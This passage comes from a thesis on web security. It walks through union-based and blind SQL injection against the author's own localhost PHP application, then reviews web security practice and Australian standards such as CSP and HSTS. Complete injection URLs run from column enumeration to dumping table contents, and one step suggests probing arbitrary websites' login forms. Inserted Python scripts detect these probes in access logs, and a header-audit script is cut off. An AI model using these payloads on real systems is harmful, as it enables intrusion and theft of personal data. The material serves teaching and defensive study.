If an error or strange behaviour is observed, pass a second single quote, i.e. two single quotes together. It is a known fact that databases use a pair of single quotes as an escape sequence: the pair is interpreted as a literal quote inside the string and not as the closing string terminator. If the result is now error-free, or the strange behaviour disappears, then the application is most likely vulnerable to injection attacks (Anley, 2007).
To confirm the existence of an injection flaw, use the database's string concatenation characters to craft a string. If the application responds to the crafted input with the expected output, the application is said to be vulnerable. Every database uses its own method of string concatenation.
Detecting input sanitization:
Use the right square bracket (the ] character) as an input character to verify exactly where the given input is used as a SQL identifier without any sanitization.
Detecting truncation issues:
Pass lengthy strings of unexpected data into the application, in the same way input is normally submitted, to check for any instance of buffer overflow. These actions may throw SQL errors on the page if the application is vulnerable.
Database type       String concatenation characters
Oracle              '||'
MS-SQL              '+'
MySQL               ' ' (a space between two single quotation marks)
Note:
- One way to confirm whether the application is accessing a database is to use "%" (a wildcard character) in the input.
- Submitting the wildcard character % in a search field will often produce many results, which indicates that a SQL query was executed in the associated database.
- Tests for SQL injection weaknesses are given in Appendix B.
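The detection side of the tests described above, as an added example that is not part of the thesis: a Python script that reads web-server access-log lines, URL-decodes each query parameter and scores it against the probe patterns this chapter uses (single or double quotes, the -- and # comment markers, UNION SELECT, ORDER BY n, the AND 1=1 / AND 1=2 boolean pairs, and version(), database(), user(), substring(), @@version and information_schema). The log lines are constructed sample data in Apache combined format that reuse the BCS URLs from sections 3.3.2 and 3.3.3 (the /bcs/search.php request is also made up), the rule weights are a scoring scheme of my own rather than a standard, and the assumption that the id parameter is an integer is mine. A lone apostrophe in an ordinary value such as O'Reilly scores only low, which is why the script scores combinations rather than alerting on any single quote.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache "combined" format).  The request
# paths reuse the BCS URLs from this chapter; client IPs, timestamps and
# user-agents are made up, as is the /bcs/search.php request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2015:10:01:02 +0930] "GET /bcs/admin/category_form.php?id=1 HTTP/1.1" 200 1420 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2015:10:01:09 +0930] "GET /bcs/admin/category_form.php?id=1' HTTP/1.1" 500 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2015:10:01:15 +0930] "GET /bcs/admin/category_form.php?id=1+order+by+4-- HTTP/1.1" 500 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2015:10:01:30 +0930] "GET /bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),3-- HTTP/1.1" 200 1430 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2015:10:02:01 +0930] "GET /bcs/admin/category_form.php?id=1%20AND%201=2 HTTP/1.1" 200 1398 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2015:10:02:40 +0930] "GET /bcs/search.php?publisher=O'Reilly HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2015:10:03:00 +0930] "GET /bcs/admin/category_form.php?id=2 HTTP/1.1" 200 1421 "-" "Mozilla/5.0"
"""

# Request line: client IP, then the method and target inside the quotes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Parameters the application defines as integers (assumption: the BCS id).
INTEGER_PARAMS = {"id"}

# (rule name, regex over the decoded value, weight).  The weights are a
# constructed scoring scheme for this example, not a standard.
RULES = [
    ("quote character", re.compile("['\"]"), 1),
    ("comment terminator", re.compile(r"--|#|/\*"), 2),
    ("union select", re.compile(r"\bunion\b.*\bselect\b", re.I), 3),
    ("order by probe", re.compile(r"\border\s+by\s+\d+", re.I), 2),
    ("boolean probe",
     re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+|'\s*=\s*'", re.I), 2),
    ("db fingerprinting",
     re.compile(r"@@version|\b(?:version|database|user|substring)\s*\(|"
                r"information_schema", re.I), 3),
]


def score_value(param, value):
    """Score one decoded parameter value; returns (score, matched rule names)."""
    score, hits = 0, []
    for name, regex, weight in RULES:
        if regex.search(value):
            score += weight
            hits.append(name)
    # A numeric parameter that arrives non-numeric is suspicious on its own,
    # because injection into an unquoted number needs no quote at all.
    if param in INTEGER_PARAMS and not value.isdigit():
        score += 2
        hits.append("non-numeric value for integer parameter")
    return score, hits


def severity(score):
    """Map a request score to a label: 0 none, 1-2 low, 3 and above high."""
    return "none" if score == 0 else "low" if score < 3 else "high"


def analyse_log(text):
    """Parse each log line, decode the query string and score every parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        total, rules = 0, []
        # parse_qsl decodes %xx escapes and turns '+' back into spaces.
        for param, value in parse_qsl(query, keep_blank_values=True):
            s, hits = score_value(param, value)
            total += s
            rules.extend(hits)
        findings.append({"ip": m.group("ip"), "target": m.group("target"),
                         "score": total, "rules": rules,
                         "severity": severity(total)})
    return findings


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        if f["severity"] != "none":
            print(f["severity"].upper(), f["ip"], f["target"], f["rules"])
```

Run against a real log the parser needs only the request line, so it works on any server that logs in this format. A high-severity hit paired with a 500 response, as on the second and third sample lines, is the probing sequence of section 3.3.2.1 seen from the server side, and the five high-severity requests from one client within a minute are the enumeration walk of sections 3.3.2.4 to 3.3.2.6.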
3.3 Types of SQL Injection:
[Figure 5: Types of SQL Injection Attack (Ping-Chen, 2011). Diagram nodes: SQL Injection; Simple SQL Injection, with sub-types Union SQL Injection and Error Based SQL Injection; Blind SQL Injection.]
The types of SQL injection are categorised in Figure 5: the simple SQL injection method and the blind SQL injection method, where the sub-types of simple SQL injection are union SQL injection and error-based SQL injection. All the types are explained in more detail in this report.
3.3.1 Simple SQL Injection Attacks (Ping-Chen, 2011):
[Figure 6: Simple SQL Injection Attacks (Ping-Chen, 2011). Diagram panels:]
Union Query
- A "UNION SELECT" statement returns the union of the intended dataset with the target dataset.
- E.g.: select Name, Phone, Address from Users where id=1 UNION ALL SELECT creditcard
System Stored Procedure
- Attackers exploit the database's stored procedures to perpetrate their attacks.
End of Line Comment
- After injecting the crafted code into a specific field, the legitimate code that follows is nullified through the use of end-of-line comments.
- E.g.: select * from user where name = 'xyz' and userid IS NULL; --';
Tautology
- Injecting statements that are always true, so that queries always return results upon evaluation of a WHERE condition.
- E.g.: SELECT * FROM users WHERE name = ' ' OR '1'='1';
Illegal/Logically Incorrect Query
- An attacker may gain knowledge by injecting illegal or logically incorrect requests, which reveal injectable parameters, data types, names of tables, etc.
Figure 6 above explains the functions and statements used to perform SQL injection attacks. An attacker can use a union query, a system stored procedure, an end-of-line comment, a tautology, or an illegal/logically incorrect query.
3.3.2 SQL Injection in MySQL Using the URL Method
Generally, an attacker may test for the vulnerability by passing a quote as input; if the application returns an error message, the web application may be considered vulnerable to SQL injection (Sutton, Greene & Amini, 2007). The error message varies depending on the type of database, so it is possible to get different errors from different web applications. Finding a SQL injection vulnerability: before launching a SQL injection attack, the hacker determines whether the configuration of the database and the related tables and variables is vulnerable. The steps to determine the SQL server's vulnerability are as follows (Naresh, Soujanya, Yugandhar & Rao, 2011):
1. Using your web browser, search for a website that uses a login page or other database input or query fields (such as an "I forgot my password" form). Look for web pages that display the POST or GET HTML commands by checking the site's source code.
2. Test the SQL server using single quotes (''). Doing so indicates whether the user input variable is sanitized or interpreted literally by the server. If the server responds with an error message that says use 'a'='a' (or something similar), then it is most likely susceptible to a SQL injection attack (Cross, 2007).
3. Use the SELECT command to retrieve data from the database or the INSERT command to add information to the database.
For this thesis, I used the BCS application, which I developed during my academic project. The name of the application is BCS (Buy Cut Save) PREDICTION. It is an application that provides information to customers for placing meat orders, so that, based on those orders, the butcher can see all the customers' orders and can add more meat items to the web application. By using MySQL injection with the URL method, I exploited all the customers' personal information, such as email, contact and company name, and the whole database, and obtained the butcher's information as well. All the following tests were done on a localhost server with this application.
3.3.2.1 Adding Malicious Characters
In a website link you may find an "=" sign. To perform a SQL injection on the website, you type commands after the "=" sign, then click "Go" in your web browser as if you were going to a new website. The simplest way to understand what needs to be done is to see an example attack broken down into steps (Palmer, 2007).
Suppose we found a site whose link contains an = sign, meaning it is a database-backed page; now we need to determine whether the link is vulnerable. Let's say we have a link like this:
http://localhost/bcs/admin/category_form.php?id=1
To test whether the link is vulnerable, we add a quote (') to the end of the URL, for example:
http://localhost/bcs/admin/category_form.php?id=1'
If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right ..." or something similar, the site is vulnerable to SQL injection.
3.3.2.2 Analysing Errors
Every database has a different syntax, so you will receive a different error message from each database. Appendix C includes some error messages from several databases (Mirdula & Manivannan, 2013).
If you do not receive an error like the one above, you must move on to the next link to test for the vulnerability. This is a very time-consuming process: first every link of the web application must be collected, and then each link must be tested with the payload. If you have received a penetration testing contract for a large web application, it may not be possible to complete the process within the time limit (Mirdula & Manivannan, 2013).
3.3.2.3 Gathering Information
Once the attacker has identified a vulnerable web link, he starts the enumeration of various database-related information. Enumeration contains various operations such as null column analysis, database version enumeration, column enumeration, etc. In this section we will see how a database can be enumerated if a web application suffers from a SQLi bug (Antunes, Vieira, 2009).
3.3.2.4 Enumerating the Number of Columns in a MySQL Database
As we know from the previous step, we have found a SQL-injectable URL, so the site is vulnerable. We now go one step further and enumerate the page to find the number of columns. For that we can use the ORDER BY statement (which tells the database how to order the result).
Injected queries in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+order+by+1-- <-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+2-- <-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+3-- <-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+4-- <-- error (a message like "Unknown column '4' in 'order clause'" or similar)
All we need to do is increment the number until we get an error like the one above. In the example above the error appeared at 4, which means the query has 3 columns, because we got an error on 4.
After finding the injection point, we now need to check the UNION function; with UNION we can select more data in one SQL statement (Messmer, 2008). So we can build the query as below:
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3
The URL above may be called the exploitable URL.
3.3.2.5 Null Column Analysis Manually
First of all we may add a comment to the end of the exploitable URL, such as /* or --.
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3/*
NOTE: if /* does not work or we get an error, then try --, for example:
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3--
It is a comment, and it is important for our query to work properly. Once we execute the URL above in the browser we will be able to see a numeric value on the page; let's say we have the number 2 on the screen. That means number 2 is the null column for this web link, and we can run our SQL commands through this column (Mcallister, Kirda & Kruegel, 2008).
Figure 7 Buy Cut Save Application Null Column Analysis
Figure 7 above is the snapshot of finding the null column in the BCS web application by performing a SQL injection attack.
3.3.2.6 Fetching the Database Version Manually
To check the version of the database we can simply use @@version or the version() function. As discussed previously, column number 2 is the null column, so we can simply put this function in place of the number two in our exploitable URL (Shar & Tan, 2013).
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),3--
Figure 8 Buy Cut Save Application Fetching Database Version
Figure 8 above is the snapshot of the experimental SQL injection query that exposed the database version in the category title column. It can be seen that when we put the exploitable URL into this web page we get the version of the database; the picture shows that 5.6.16 is the version of the database.
If we get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then the convert(), hex() and unhex() functions can be used (Easttom, 2012).
Injected queries in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,convert(@@version using latin1),3--
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,unhex(hex(@@version)),3--
And you will get the MySQL version of the database.
3.3.2.7 Fetching the Database Name
To find the database name we can use the database() function. To test this we replace the number 2 with database() and get something similar to the image below (Alanazi & Sarrab, 2011).
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,database(),3--
Figure 9 Buy Cut Save Application Fetching Database Name
You can see from Figure 9 that we replaced column number 2 with database(), and we got the name of the database, INFORMATION_SCHEMA.
3.3.2.8 Fetching User Information
To find out which user is using this database we replace the number 2 with user() and get something like the image below (Oehlert, 2005):
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,user(),3--
Figure 10 Buy Cut Save Application Fetching User Information
We can see in Figure 10 that by applying user() we got the username root@localhost, which is the user accessing this database. This web application is running on a localhost server.
3.3.2.9 Database, Table, and Column Enumeration
Once the database information has been enumerated successfully, the next step is to obtain the list of database tables and column names. In this section we will see how the column and table names of the database can be enumerated if the web application suffers from a SQL injection vulnerability (Alanazi & Sarrab, 2011).
- Enumerating table names for MySQL version < 5:
Now that we have the version, we enumerate the database table and column names. If the MySQL version is < 5 (i.e. 4.1.33, 4.1.12, ...) we must guess table and column names in most cases. Common table names are: users, admin, member, ... Common column names are: username, user, user_name, password, pass, passwd, pwd, etc.
If the MySQL version is 5, the above method will not work, but we can use the following method instead. For this we need the database name, which we already obtained using database(). We can use the information_schema database to find the table names. To get the tables we use table_name from information_schema.tables (Howard, LeBlanc & Viega, 2010).
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,table_name,3+from+information_schema.tables--
Here we replace the number 2 with table_name to get the first table from information_schema.tables, displayed on the screen below.
Figure 11 Buy Cut Save Application Database, Table and Column Enumeration
You can see from Figure 11 that we got the name of the first table, CHARACTER_SETS, which is in the information_schema database. We can add LIMIT to the end of the query to list all tables (Ringgold & Portland, 2012).
3.3.2.10 Enumerating Columns
Now we want to get the column names of a particular database. We will use column_name and information_schema.columns to get the column names.
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns--
Here we replace the number 2 with column_name to get the first column from information_schema.columns, displayed on the screen below. We can add LIMIT to the end of the query to list all columns.
Figure 12 Buy Cut Save Application Enumerating Columns
We can see from the example given in Figure 12 that by using column_name we got the name of the column in the information_schema database.
3.3.2.11 Dumping the Database
The database dumping process can start only once we have the column information. The next task of the penetration tester is to enumerate the information inside the columns of the table. The database holds all the information, such as passwords and user information. The penetration tester tries to dump the database information using these techniques (Howard, LeBlanc & Viega, 2010).
Now, to read the column contents, we use the table name and the column name in the URL. Once we execute the URL defined below we receive the information that exists in the defined column.
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,CHARACTER_SET_NAME,3+from+CHARACTER_SETS--
So, in this way we can use the MySQL URL method to carry out a SQL injection attack, and as we saw in the example of the BCS PREDICTION web application, we can obtain all the database information using SQL injection.
Below is the snapshot of the database dumped using the MySQL URL method.
Figure 13 Buy Cut Save Application Dumping Database
We can see in Figure 13 that I found the database name, table names, column names and all the information in the database by using the MySQL URL method of SQL injection.
3.3.3 SQL Injection in MySQL by the Blind Injection Method:
Blind injection is a little more complicated than URL injection, but it can be
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1
This time, when we use the URL above, the page loads normally; now let's check whether it is vulnerable to blind injection.
3.3.3.1 Vulnerability Checking in Blind SQL Injection
Put AND 1=1 after the id in the URL. The page will load normally because this condition is always true. For example:
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1%20AND%201=1
Condition is true:
Figure 14 Buy Cut Save Application Blind SQL Injection Checking
Figure 14 above shows the blind injection vulnerability check performed by passing the values in the URL. There is no visible change in the snapshot given in Figure 14 after passing the values in the URL.
Now change 1=1 to 1=2, which is false, and see what happens. For example:
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1%20AND%201=2
If some text, picture or other content is missing from the returned page, then the site is vulnerable to blind SQL injection. We can see in the snapshot below that when the condition is false, "CATEGORY OF TYPE" shows Category Title instead of "BEEF".
Figure 15 Buy Cut Save Application Blind SQL Injection Checking
Now, as we can see in Figure 15, we have found that the site is vulnerable to blind SQL injection. Next we get the MySQL version; to get the version in a blind attack we use substring. We use true and false conditions with the version function to check whether the version of the database is 5 or 4.
3.3.3.2 Getting the Version in a MySQL Database
In blind SQL injection the database version is obtained with the substring function and @@version. For example:
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)=5--+-%E2%80%99
This returns TRUE if the version of MySQL is 5. If the database has version 5, this condition is true, so the page loads normally.
Figure 16 Buy Cut Save Application Getting Version in MySQL Database
In Figure 16, I replaced 5 with 4; if the database has version 5, this condition is false.
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)=4--+-%E2%80%99
As identified in Figure 17, after passing the query some pictures or icons on the web page change. We can see from the snapshot below that the Category Title has changed.
Figure 17 Buy Cut Save Application Getting Version in MySQL Database
3.3.3.3 Enumerating Table Names from the Current Database:
In blind injection we have to guess table names using a condition. If the condition is true, the page loads normally.
We try different table names, as given below in Figures 18, 19 and 20:
(1) Passwords
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201%20from%20passwords%20limit%200,1)=1--+
(We got an error.)
Figure 18 Buy Cut Save Application Enumerating Name from Database
(2) Users
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201%20from%20users%20limit%200,1)=1--+
(We got an error.)
Figure 19 Buy Cut Save Application Enumerating Name from Database
(3) Admin
Injected query in the Buy Cut Save application:
http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201%20from%20admin%20limit%200,1)=1--+
(The page loads normally, which means the condition is true: the database has a table named "admin".)
Figure 20 Buy Cut Save Application Enumerating Name from Database
3.3.3.4 Enumerating Column Names:
Now we do the same as for the table name: we start guessing. As said before, try the common names for columns.
44
PRT505
Thesis
 (1) User id
Injected Queries in Buy Cut save Application:
http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substring(concat(1,userid),1,1)%20from%20admin%20limit%200,1)=1--+
If the page loads normally we know that the column name is User id in the admin table (if the
condition is false, try other common names or just guess). In Figure 21 below we can see that we
got an error, which means there is no User id column in the admin table.
Figure 21 Buy Cut save Application Enumerating Column Name
(2) Admin_id
Injected Queries in Buy Cut save Application:
http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substring(concat(1,admin_id),1,1)%20from%20admin%20limit%200,1)=1--+-
Figure 22 Buy Cut save Application Enumerating Column Name
As Figure 22 shows, the page loads normally, which means there is a column named admin_id in
the admin table. In this way, using blind SQL injection techniques, we dump the database.
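A defender-side check for the probes in this section, as an added example (not part of the thesis or the BCS application): it parses constructed Apache-format access-log lines carrying the page's category_form.php requests, URL-decodes the id parameter and flags the boolean-subquery, @@version and substring/limit patterns, then counts how many flagged requests each client sent. The log lines, the signature names and the three-request threshold are constructed assumptions.

```python
"""Detection of boolean-based blind SQL injection probes in web server logs.

Added example for the thesis section above; the log lines are constructed in
Apache combined format and reuse the request URLs the page sends to
category_form.php. Nothing here is code from the BCS application.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed sample log: two legitimate requests followed by three probes
# (version probe, table-name probe, character-extraction probe).
SAMPLE_LOG = """\
127.0.0.1 - - [10/May/2015:10:01:02 +0930] "GET /bcs/admin/category_form.php?id=1 HTTP/1.1" 200 2310
127.0.0.1 - - [10/May/2015:10:01:09 +0930] "GET /bcs/admin/category_form.php?id=2 HTTP/1.1" 200 2298
127.0.0.1 - - [10/May/2015:10:02:41 +0930] "GET /bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)=5--+- HTTP/1.1" 200 2310
127.0.0.1 - - [10/May/2015:10:03:15 +0930] "GET /bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201%20from%20passwords%20limit%200,1)=1--+ HTTP/1.1" 500 612
127.0.0.1 - - [10/May/2015:10:03:52 +0930] "GET /bcs/admin/category_form.php?id=1%20and%20(SELECT%20substring(concat(1,admin_id),1,1)%20from%20admin%20limit%200,1)=1--+- HTTP/1.1" 200 2310
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Signature names are our own; each pattern is matched against the decoded,
# lower-cased parameter value and is written from the probes shown on the page.
SIGNATURES = [
    ("boolean-subquery", re.compile(r"\band\s+\(*\s*select\b")),
    ("version-probe", re.compile(r"@@version")),
    ("char-extraction", re.compile(r"\bsubstring\s*\(.*\blimit\s+\d+\s*,\s*\d+")),
    ("comment-terminator", re.compile(r"--(\s|$)")),
]

# Parameters the application only ever uses as integers (assumption: id).
NUMERIC_PARAMS = {"id"}


def inspect_request(target: str) -> dict:
    """Return {param: [signature names]} for each query parameter that looks
    like an injection attempt; an empty dict means the request is clean."""
    findings = {}
    query = parse_qs(urlparse(target).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            # parse_qs decoded once; a second pass also catches double encoding.
            decoded = unquote_plus(value).lower()
            hits = [sig for sig, pat in SIGNATURES if pat.search(decoded)]
            if name in NUMERIC_PARAMS and not decoded.strip().isdigit():
                hits.append("non-numeric-id")
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


def analyse_log(text: str) -> list:
    """Parse each log line and collect an alert for every flagged request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_request(m["target"])
        if findings:
            alerts.append({"ip": m["ip"], "ts": m["ts"],
                           "status": int(m["status"]), "findings": findings})
    return alerts


def probing_clients(alerts: list, threshold: int = 3) -> set:
    """Blind injection needs many true/false requests from one client, so
    report sources whose flagged request count reaches the threshold."""
    counts = {}
    for alert in alerts:
        counts[alert["ip"]] = counts.get(alert["ip"], 0) + 1
    return {ip for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = analyse_log(SAMPLE_LOG)
    for alert in found:
        print(alert["ts"], alert["ip"], alert["status"], alert["findings"])
    print("probing clients:", probing_clients(found))
```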
V. Literature review on web security practices
5.1 History of web application security fields and practice
Web applications were introduced in 1990, when the web was a general delivery mechanism. It has
since transformed from a medium for static hypertext documents into a complete dynamic run-time
environment for multi-party and distributed applications. Web technologies have progressively
moved from a centralised server technology to interaction models and a dynamic client model. The
emerging trend was popular in peer-to-peer web applications and multiple applications. But the
transformation of the web application away from the server-centric model creates significant and
numerous challenges for web application security (Alanazi & Sarrab 2011). In the past decade it
was not possible to make web applications client-centric. This works as motivation for the need
for compact security of web applications.
[Figure 23 timeline, recovered from the figure text: first web server and browser introduced; W3C issue; PHP 1.0 and Apache released, IIS 1.0 released on Windows NT, LiveScript (JavaScript), MySQL and IE1 released; OWASP started, ASP.NET 1.0 released, SQL Slammer worm, work started on HTML5; Samy worm released, AJAX term proposed, web vulnerability scanners introduced; infinite coding errors; web application hacking arrives]
Figure 23 History of Web application Development till Hacking Arrives (Owasp.org.au, 2015)
Figure 23 shows how the development of the web server and of the languages took web applications
into the world market. After the introduction of the web server and browser, continuous
development started. Since this is a process of transformation, its security concerns start with
its progress. The year 1995 was a year of new achievements in the area of web development, and many
new things were discovered. In late 1994 the W3C was introduced. PHP 1.0 and the Apache server were
introduced in 1995 (Alanazi & Sarrab 2011). Microsoft released its software for web development,
named IIS, and Internet Explorer 1 was also introduced.
Some methodologies were used for the security of web applications at the initial level of
development.
Fine-grained access control: these are the policies that define how the application's
authentication process runs and how the application authorises end users. In the beginning of web
applications, security was simple: web application frameworks checked it, and simple sequences
maintained the application's integrity. A series of questions about the foundation of the
authentication process and protocols limited the feasibility of authentication, such as secure
session management (Alanazi & Sarrab 2011).
Information-flow control: this specifies the security of sensitive data, trust domains, data
integration, and client-side and server-side information processing. Initially in web development,
an organisation's policies were the basis for the security policy of a web application.
Information-flow policies involved individuals with possibly different goals. At that time,
end-to-end tracking of information and of its flow in web applications could not be determined and
was followed by end-user review. Information-flow control policies are a set of mechanisms
practically implemented in a web setting.
Secure composition: at the start, security was applied in the code of web applications; in short,
the code alone was responsible for the security of a web application. Traditional HTML fails to
deliver both the interaction and the security needs. Security is a composition of interaction and
separation.
Cross-domain interaction: the original and unresolved problem of the last decade in web
development is the inherent incompatibility that lies in the cross-domain nature of the hyperlink.
In the past the situation was even more complex. Nowadays JavaScript, from its birth in web
application development, plays an important role in securing web applications, and its semantics
are being formalised. HTML5 also comes with many security features against various threats to web
applications (Desmet and Johns, n.d.).
5.2 Web security design with software engineering
Most applications are developed with software engineering models that help in the management of
resources. Organisations were not fully aware of security issues, which were not considered a
serious element in the development life cycle.
Organisations manage application security through separate processes to meet requirements.
Meanwhile the SDLC provides options for the security of an application: the security services can
be implemented within the phases of the development life cycle (Meier, 2006).
Figure 24 Security in SDLC Process (SANS Institute, 2007)
Figure 24 explains security in the SDLC, defining the techniques that represent a secure software
development process.
5.2.1 Security Requirements
To find out the requirements, the first step is to classify the application. At the beginning of
application development, the expected level of security for the software is determined. The
application is categorised on the basis of its usage, the sensitivity of its data, the technology to
be used and the application type, i.e. web-based or non-web-based. This helps in setting the
required level for the application: low, medium or high (SANS Institute, 2007).
5.2.2 Secure Application Design and threat modelling
Web application security, and the potential vulnerabilities that may compromise the application if
it is not designed with security measures, need attention. At the architectural level of a web
application, the attack surface must be measured. The design must be based on assumptions and on
researched potential threats (Nahari, Krutz, & Books24x7, 2011). Here the formal application
security requirements and the specification are combined. This activity of the phase is called
threat modelling. It helps in understanding the possible threats to the application. Threat
modelling includes defining the application components, segmenting the application, and finding
dependencies (internal and external). It is necessary to resolve the possible issues. At the end of
the phase, the finalised design is reviewed from a security point of view. Some vulnerability
techniques and modelling tools are also used for threat analysis. Common threats include loss of
sensitive or confidential data, denial of service, unauthorised access, etc.
By identifying all illegal actions that could be carried out against the application, it becomes
possible to counter those actions. This helps in diminishing the risks associated with malicious
system use. The response to a risk can be to eliminate the risk, to reduce the risk, or to accept
the risk.
5.2.3 Develop with Secure Coding
It is known that probable security bugs arise in the application mainly during the development
phase. During this phase the occurrence of security issues depends on the coding conventions,
coding standard, choice of language, development environment, baselines for security, data
handling methods, integration with external applications and implementation of security features.
A coding standard needs to be established for securing your applications. There are many ways and
techniques available for different technologies to write code with a secure approach. These
techniques must be used to manage security issues and coding errors.
Hence, the vital thing is that these practices are applied in the code for all modules of the
application, so that bugs can be found in the early phase of development rather than after the code
is released for distribution.
5.2.4 Application Security Testing
The importance and cost have increased with the completion of each phase of the development life
cycle model. Thus a test strategy needs to be made for every phase. Testing each phase helps
prevent errors or defects in the application. Generally testing is done in the last phase, after
deployment of all code, by black box testing to find potential risks. Black box testing is the
most common and reliable approach used for testing. But risks and bugs are increasing
exponentially, and testing applications are being developed for the same reasons. Automated testing
is growing fundamental to testing applications (Mehta, n.d.).
5.3 Standards of the Australian web security
Some norms for web security are described by the defence department of the Australian government.
Web application security services can be implemented on the server side. Security activities
include input validation, enabling or disabling JavaScript on the client side, HTTP header
compatibility, etc. We will discuss the following three policies and standards (dpc.sa.gov.au,
2015):
• Content Security Policy
• HTTP Strict Transport Security
• Cookie Security Enhancement
5.3.1 Content Security Policy
A content security policy helps in diminishing attacks such as XSS (cross-site scripting) and
malicious content. To apply this standard to a web application, developers have to impose a
whitelist of content sources. This security standard manages scripts, audio, video and images. It
also controls the execution of inline JavaScript and of code created from strings (dpc.sa.gov.au,
2015).
Content security policy helps developers reduce concerns over compromise of the web application.
It is an effective way to apply a basic standard to an application. This policy also lets the web
browser report any breaches present in the website.
5.3.2 HTTP Strict Transport Security
HTTP Strict Transport Security (HSTS) alleviates the risk of information leakage and
eavesdropping. HSTS instructs browsers to use only secure connections when communicating with the
web application. Secure connections are required when a web application deals with personal data
or other sensitive information. This is a challenging task when the site is complex (dpc.sa.gov.au,
2015). HTTPS protects the session ID while sensitive information is being transferred. HTTPS does
not allow connections to insecure content.
HSTS can help solve this without requiring large changes to the web application. Consider the
following example: it shows a transaction sequence for entering a website, i.e. the sign-in
process, by providing personal information. The Txn site has been developed poorly and permits
sensitive information to pass over unencrypted HTTP requests.
Figure 25 HTTP Strict Transport Security
Figure 25 explains the data flow, with web security, between the browser and the web application.
It is explained in detail below:
5.3.3 Cookie Security Enhancements
Websites use cookies to store the session IDs used for authenticating a user. It is important that
these cookies are secured so as to avoid discovery of the session ID, which can lead to illegal
access to the website. Cookie security can be enhanced by implementing a content security policy
and HSTS (Asd.gov.au, 2015).
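To turn Sections 5.3.1 to 5.3.3 into a concrete check, here is an added example (not from the thesis or the cited standard) that audits a response's Content-Security-Policy, Strict-Transport-Security and Set-Cookie headers against the properties described above, showing a weak header set beside a corrected one. The two header sets are constructed; the one-year max-age threshold and the Secure/HttpOnly cookie attributes are assumptions that go slightly beyond the page's text.

```python
"""Response-header audit for CSP, HSTS and session-cookie protection.

Added example for the thesis section above. WEAK_HEADERS and HARDENED_HEADERS
are constructed; the thresholds are assumptions, not values from the standard.
"""
import re

WEAK_HEADERS = {
    "Content-Security-Policy": "default-src *; script-src * 'unsafe-inline'",
    "Set-Cookie": "PHPSESSID=constructedsessionid; Path=/",
}

HARDENED_HEADERS = {
    "Content-Security-Policy": ("default-src 'self'; script-src 'self'; img-src 'self'; "
                                "media-src 'self'; report-uri /csp-report"),
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Set-Cookie": "PHPSESSID=constructedsessionid; Path=/; Secure; HttpOnly",
}

MIN_HSTS_AGE = 365 * 24 * 3600  # one year (assumed minimum for this check)


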